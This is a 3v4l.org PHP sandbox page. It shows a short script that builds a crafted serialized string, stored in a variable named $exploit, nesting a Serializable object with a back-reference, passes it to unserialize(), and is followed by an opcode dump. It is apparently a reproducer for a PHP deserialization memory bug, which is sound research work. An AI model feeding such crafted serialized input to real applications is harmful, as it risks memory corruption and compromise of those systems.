3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { public $data; } $object = new obj(); $object->data = 1; $inner = serialize($object); $exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; $data = unserialize($exploit); var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/4975J
function name:  (null)
number of ops:  24
compiled vars:  !0 = $object, !1 = $inner, !2 = $exploit, !3 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   DECLARE_CLASS                                            'obj'
    8     1        NEW                                              $4      'obj'
          2        DO_FCALL                                      0          
          3        ASSIGN                                                   !0, $4
    9     4        ASSIGN_OBJ                                               !0, 'data'
          5        OP_DATA                                                  1
   10     6        INIT_FCALL                                               'serialize'
          7        SEND_VAR                                                 !0
          8        DO_ICALL                                         $8      
          9        ASSIGN                                                   !1, $8
   11    10        STRLEN                                           ~10     !1
         11        CONCAT                                           ~11     'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~10
         12        CONCAT                                           ~12     ~11, '%3A%7B'
         13        CONCAT                                           ~13     ~12, !1
         14        CONCAT                                           ~14     ~13, '%7Di%3A1%3BR%3A3%3B%7D'
         15        ASSIGN                                                   !2, ~14
   13    16        INIT_FCALL                                               'unserialize'
         17        SEND_VAR                                                 !2
         18        DO_ICALL                                         $16     
         19        ASSIGN                                                   !3, $16
   14    20        INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !3
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class obj: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
168.78 ms | 1386 KiB | 19 Q